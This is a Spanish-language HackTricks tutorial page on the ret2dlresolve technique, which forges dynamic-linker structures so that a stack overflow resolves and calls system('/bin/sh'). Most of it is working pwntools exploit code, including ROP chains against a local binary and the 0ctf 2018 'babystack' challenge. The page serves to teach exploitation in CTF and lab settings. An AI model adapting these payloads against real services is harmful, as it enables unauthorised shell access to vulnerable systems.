Ret2dlresolve

Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF ¡Consulta los PLANES DE SUSCRIPCIÓN!
Obtén merchandising oficial de PEASS & HackTricks
Descubre The PEASS Family, nuestra colección exclusiva de NFTs
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte tus trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

Información Básica

Como se explica en la página sobre GOT/PLT y Relro, los binarios sin Full Relro resolverán símbolos (como direcciones a bibliotecas externas) la primera vez que se utilizan. Esta resolución ocurre llamando a la función _dl_runtime_resolve.

La función _dl_runtime_resolve toma de la pila referencias a algunas estructuras que necesita para resolver el símbolo especificado.

Por lo tanto, es posible falsificar todas estas estructuras para que la resolución dinámica enlazada resuelva el símbolo solicitado (como la función system) y lo llame con un parámetro configurado (por ejemplo, system('/bin/sh')).

Por lo general, todas estas estructuras se falsifican creando una cadena ROP inicial que llama a read sobre una memoria escribible, luego las estructuras y la cadena '/bin/sh' se pasan para que sean almacenadas por read en una ubicación conocida, y luego la cadena ROP continúa llamando a _dl_runtime_resolve, teniendo así que resolver la dirección de system en las estructuras falsas y llamar a esta dirección con la dirección de $'/bin/sh'.

Esta técnica es especialmente útil si no hay gadgets de llamada al sistema (para usar técnicas como ret2syscall o SROP) y no hay formas de filtrar direcciones de libc.

Checa este video para una buena explicación sobre esta técnica en la segunda mitad del video:

O consulta estas páginas para una explicación paso a paso:

Resumen del Ataque

Escribir estructuras falsas en algún lugar
Establecer el primer argumento de system ($rdi = &'/bin/sh')
Establecer en la pila las direcciones a las estructuras para llamar a _dl_runtime_resolve
Llamar a _dl_runtime_resolve
system será resuelto y llamado con '/bin/sh' como argumento

Desde la documentación de pwntools, así es como se ve un ataque de ret2dlresolve:

context.binary = elf = ELF(pwnlib.data.elf.ret2dlresolve.get('amd64'))
>>> rop = ROP(elf)
>>> dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["echo pwned"])
>>> rop.read(0, dlresolve.data_addr) # do not forget this step, but use whatever function you like
>>> rop.ret2dlresolve(dlresolve)
>>> raw_rop = rop.chain()
>>> print(rop.dump())
0x0000:         0x400593 pop rdi; ret
0x0008:              0x0 [arg0] rdi = 0
0x0010:         0x400591 pop rsi; pop r15; ret
0x0018:         0x601e00 [arg1] rsi = 6299136
0x0020:      b'iaaajaaa' <pad r15>
0x0028:         0x4003f0 read
0x0030:         0x400593 pop rdi; ret
0x0038:         0x601e48 [arg0] rdi = 6299208
0x0040:         0x4003e0 [plt_init] system
0x0048:          0x15670 [dlresolve index]

Ejemplo

Pwntools Puro

Puedes encontrar un ejemplo de esta técnica aquí que contiene una muy buena explicación de la cadena ROP final, pero aquí está el exploit final utilizado:

from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)
p = elf.process()
rop = ROP(elf)

# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve)     # call .plt and dl-resolve() with the correct, calculated reloc_offset

log.info(rop.dump())

p.sendline(rop.chain())
p.sendline(dlresolve.payload)    # now the read is called and we pass all the relevant structures in

p.interactive()

Crudo

# Code from https://guyinatuxedo.github.io/18-ret2_csu_dl/0ctf18_babystack/index.html
# This exploit is based off of: https://github.com/sajjadium/ctf-writeups/tree/master/0CTFQuals/2018/babystack

from pwn import *

target = process('./babystack')
#gdb.attach(target)

elf = ELF('babystack')

# Establish starts of various sections
bss = 0x804a020

dynstr = 0x804822c

dynsym = 0x80481cc

relplt = 0x80482b0

# Establish two functions

scanInput = p32(0x804843b)
resolve = p32(0x80482f0) #dlresolve address

# Establish size of second payload

payload1_size = 43

# Our first scan
# This will call read to scan in our fake entries into the plt
# Then return back to scanInput to re-exploit the bug

payload0 = ""

payload0 += "0"*44                        # Filler from start of input to return address
payload0 += p32(elf.symbols['read'])    # Return read
payload0 += scanInput                    # After the read call, return to scan input
payload0 += p32(0)                        # Read via stdin
payload0 += p32(bss)                    # Scan into the start of the bss
payload0 += p32(payload1_size)            # How much data to scan in

target.send(payload0)

# Our second scan
# This will be scanned into the start of the bss
# It will contain the fake entries for our ret_2_dl_resolve attack

# Calculate the r_info value
# It will provide an index to our dynsym entry
dynsym_offset = ((bss + 0xc) - dynsym) / 0x10
r_info = (dynsym_offset << 8) | 0x7

# Calculate the offset from the start of dynstr section to our dynstr entry
dynstr_index = (bss + 28) - dynstr

paylaod1 = ""

# Our .rel.plt entry
paylaod1 += p32(elf.got['alarm'])
paylaod1 += p32(r_info)

# Empty
paylaod1 += p32(0x0)

# Our dynsm entry
paylaod1 += p32(dynstr_index)
paylaod1 += p32(0xde)*3

# Our dynstr entry
paylaod1 += "system\x00"

# Store "/bin/sh" here so we can have a pointer ot it
paylaod1 += "/bin/sh\x00"

target.send(paylaod1)

# Our third scan, which will execute the ret_2_dl_resolve
# This will just call 0x80482f0, which is responsible for calling the functions for resolving
# We will pass it the `.rel.plt` index for our fake entry
# As well as the arguments for system

# Calculate address of "/bin/sh"
binsh_bss_address = bss + 35

# Calculate the .rel.plt offset
ret_plt_offset = bss - relplt


paylaod2 = ""

paylaod2 += "0"*44
paylaod2 += resolve                 # 0x80482f0
paylaod2 += p32(ret_plt_offset)        # .rel.plt offset
paylaod2 += p32(0xdeadbeef)            # The next return address after 0x80482f0, really doesn't matter for us
paylaod2 += p32(binsh_bss_address)    # Our argument, address of "/bin/sh"

target.send(paylaod2)

# Enjoy the shell!
target.interactive()

Otros Ejemplos y Referencias

https://youtu.be/ADULSwnQs-s
https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve
https://guyinatuxedo.github.io/18-ret2_csu_dl/0ctf18_babystack/index.html
32 bits, sin relro, sin canary, nx, sin pie, desbordamiento de búfer pequeño básico y retorno. Para explotarlo, se utiliza el desbordamiento de búfer para llamar a read nuevamente con una sección .bss y un tamaño mayor, para almacenar allí las tablas falsas de dlresolve para cargar system, volver a main y volver a abusar del desbordamiento inicial para llamar a dlresolve y luego system('/bin/sh').

AnteriorRet2csu SiguienteRet2esp / Ret2reg

Última actualización hace 24 días